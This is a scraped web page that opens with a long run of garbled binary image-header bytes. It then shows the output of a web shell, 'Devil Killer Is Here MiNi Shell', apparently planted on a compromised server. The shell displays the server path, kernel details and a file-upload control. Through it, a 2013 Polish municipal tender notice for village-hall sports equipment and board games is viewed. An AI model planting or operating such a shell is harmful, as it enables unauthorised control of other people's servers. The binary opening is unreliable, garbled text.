JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131031/444770-N-2013.html

<p class="kh_header"><b>Polanów: Zakup wyposażenia do świetlicy wiejskiej w Nacławiu</b><br>
<b>Numer ogłoszenia: 444770 - 2013; data zamieszczenia: 31.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Polanów , ul. Wolności 4, 76-010 Polanów, woj. zachodniopomorskie, tel. 094 3188351, 3480641, faks 094 3188387.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wyposażenia do świetlicy wiejskiej w Nacławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I : Sprzęt rekreacyjny i sportowy

1. Komplet rekreacyjny (stół +2 ławki)	stół, ławka długość/szerokość około 220/60, 220/35  kpl.	10 (stół + 2 ławki), sosnowy, klejony, zaimpregnowany lub polakierowany, ławki bez oparcia na podstawie z profili stalowych
2. Stół do tenisa stołowego grubość płyty 16 mm, 4 kółka transportowe	szt.1	składany, zgodny z normami Międzynarodowej Federacji Tenisa Stołowego (ITTF), zielony, oficjalny rozmiar ITTF, grubość płyty 16 mm, wzmocniona 38 mm profilem PCV, 4 kółka transportowe
3. Piłka do koszykówki rozmiary 6 i 7 ( 3 sztuki rozmiaru 6 i 2 sztuki rozmiaru 7)	szt.5	z wytrzymałego tworzywa sztucznego lub gumowego, odporna na ścieranie, do treningów na powietrzu
4. Piłka do gry w piłkę nożną	rozmiar 5.	szt.5	Poliuretan, szyta ręcznie, zawór zwrotny butylowy, dętka lateksowa, 32 panele
5. Piłka do siatkówki rozmiar 5.szt.	5 z trwałego tworzywa syntetycznego, szyta ręcznie, 18 panelowa
6.Pompka do piłek	z wężykiem	szt.1 z wężykiem, kompaktowe wymiary
7.Siatka do siatkówki długość/szerokość około  950/100 szt.	2 ze sznurka nylonowego, obszyta taśmami usztywniającymi, grubość sznurka 2mm,  biała
8. Paletki do tenisa stołowego	grubość gąbki 0,18 szt.	20 rakieta do tenisa stołowego do gry rekreacyjnej, rączka anatomiczna
9. Piłeczki do tenisa stołowego średnica około 4	szt.100 kolor biały
10.Zestaw do badmintona (2 rakiety + lotka)zestaw w etui	kpl.10	(2 rakietki + 2 lotki) w etui, materiał rakietki aluminium, owijka PVC, naciąg nylon, siatka nylon, lotki z plastiku
11.Gra piłkarzyki	wymiary pola do gry około 102/58	szt.1	gra wykonana z drewna i płyty MDF, prowadnice wykonane ze stali chromowanej o grubości 15 mm, dwa chromowane wsporniki nóg , przeciwpoślizgowe gumowe uchwyty
12.Zestaw do gry w lotki tarcza, 6 rzutek	kpl.2	standardowa elektroniczna tarcza do darta, ilość graczy: 1-8, 6 rzutek z zapasowymi końcówkami (100 szt.),1 wyświetlacz LCD, sygnalizacja głosowa i dźwiękowa, instrukcja w języku polskim, certyfikat CE i ROHS
13.Namiot szybkiego montażu z pokrowcem i nadrukiem wymiary około 300 x 600	szt.1	z nadrukiem Sołectwo Nacław, 3x6 m,wysokość boku około 2m, stelaż metalowy malowany proszkowo, poszycie z wodoodpornego poliestru, 3 ścianki.

CZĘŚĆ II - Gry planszowe(logiczne, edukacyjne, przyrodnicze, strategiczne - dla dzieci, młodzieży i dorosłych)

1.Gry planszowe, logiczne, edukacyjne, przyrodnicze, strategiczne - dla dzieci, młodzieży i dorosłych	warcaby, szachy, świat zwierząt, unia europejska, omnibus, chińczyk, prawo jazdy rowerowe, biznes po polsku, gra w okręty	szt.	40	Wymiary pudełka minimalne: 4 x Warcaby: wymiary pudełka: 345x220x45 mm, 2 x Szachy: wymiar szachownicy po rozłożeniu: 285x285 mm, drewniana szachownica stanowi pudełko na figury, drewniane figury posiadają filcowe spody, wysokość króla: 65 mm, wielkość pola: 35 mm, wymiary pudełka 290x290x55 mm, 2 x Szachy; plansza do gry 32 figury, wymiary pudełka 245x255x60 mm,  2 x Fauna, plansza do gry, 180 kart zwierząt, wymiary pudełka 300x300x90 mm, 1 x Animal domino, 27 par obrazków, wymiary pudełka 155x105x85 mm, 1 x Panoramiczne zwierzęta -  puzle 1000 elementów, wymiary pudełka 375x275x60 mm, 4 x Unia europejska, wymiary pudełka 395x270x50 mm, 2 x Omnibus - gra w skojarzenia, 45 kart, wymiary pudełka 110x185x40 mm, 2 x - Omnibus - Obudź swoje szare komórki 192 karty, wymiary pudełka 195x290x40 mm, 2 x Chińczyk magnetyczny 25 cm - wymiary pudełka 255x130x45 mm, 2x Chińczyk, wymiary pudełka 360x220x40 mm, 2x Prawo jazdy rowerowe, wymiary pudełka 245x255x60 mm, 2 razy Znaki drogowe, wymiary pudełka 380x260x55 mm, 4 x Biznes po polsku, wymiary pudełka 380 x 260x55mm, 2 x Gra w okręty - bitwa morska, wymiary pudełka 400x270x55 mm, 2 x Statki  - bitwa morska, wymiary pudełka 110x185x40 mm, 2x Domino - linia klasyczna, wymiary pudełka 190x275x70 mm, 2 x Podróż do wnętrza ziemi wymiary pudełka300x300x75 mm.

Elementami składowymi przedmiotu zamówienia są także wszelkie roboty i usługi towarzyszące realizacji dostawy, o których mowa w pkt 1 Rozdziału III SIWZ, w szczególności: koszty uzyskania niezbędnych badań, opinii i uzgodnień (jeżeli dotyczy) zużycia energii elektrycznej, ubezpieczenie, zabezpieczenie miejsca dostawy i montażu, rozruchu, przeszkolenia wskazanych pracowników urzędu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.46.10.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości:
1.część I - 40,00zł
2.część II - 350,00zł</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie potwierdzające, że wykonawca nie zalega z opłacaniem podatków oraz opłat do Urzędu Skarbowego lub oświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  załącznik 1/5
Oświadczenie potwierdzające, że wykonawca nie zalega z opłacaniem opłat oraz składek do ZUS na ubezpieczenie zdrowotne lub oświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - załącznik 1/6 
Oświadczenie o przynależności lub braku przynależności do grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5- załącznik 1/7</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust.1 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmiany w formie aneksów w niżej wymienionych  przypadkach:
-  zmiana w kolejności i terminach dostawy,
1) Zmiany rzutujące na termin wykonania umowy możliwe jest przedłużenie terminu zakończenia umowy o czas opóźnienia, jeżeli opóźnienie to wynika z przyczyn leżących po stronie Zamawiającego i jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy, w zakresie następujących  obowiązków Zamawiającego:
a) przekazania pomieszczeń do montażu,
2. Możliwa jest zmiana terminu wykonania umowy, ewentualne wstrzymanie/wznowienie dostaw, ze względu na:
  a) oczekiwanie Wykonawcy na niezbędne opinie, decyzje administracyjne (opóźnienie spowodowane przez władze odpowiednich instytucji),
  b) przedłużenie procedury przetargowej,
  c) uwarunkowania społeczne (protesty, listy, petycje, itp.),
  d) dostawy dodatkowe,
  e) technologie wykonania robót,
  f) zmianę stanu prawnego,
  g) warunki geotechniczne, których nie można było przewidzieć,
  h) szczególnie niesprzyjające warunki atmosferyczne,
  i) działania sił natury, uznane za stan klęski żywiołowej.
Wykonawca nie będzie miał prawa do przedłużenia terminu zakończenia umowy jeżeli  przedłużenie terminu wynika z przyczyn leżących  po stronie Wykonawcy.
3. Zmiany rzutujące na wynagrodzenie:
Możliwa jest zmiana postanowienia umowy w związku:
 a) ze zmianą stawki podatku od towarów i usług (VAT),
 b) obniżeniem kosztu dostawy a tym samym wynagrodzenia,
 c) Wykonawcy ze względu na rezygnację z części robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.polanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Polanowie
ul. Wolności 4
76-010 Polanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.11.2013 godzina 10:00, miejsce: Urząd Miejski w Polanowie
ul. Wolności 4
76-010 Polanów
Sekretariat - pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja współfinansowana jest ze środków Unii Europejskiej w ramach działania Odnowa i rozwój wsi  Programu Rozwoju Obszarów Wiejskich na lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com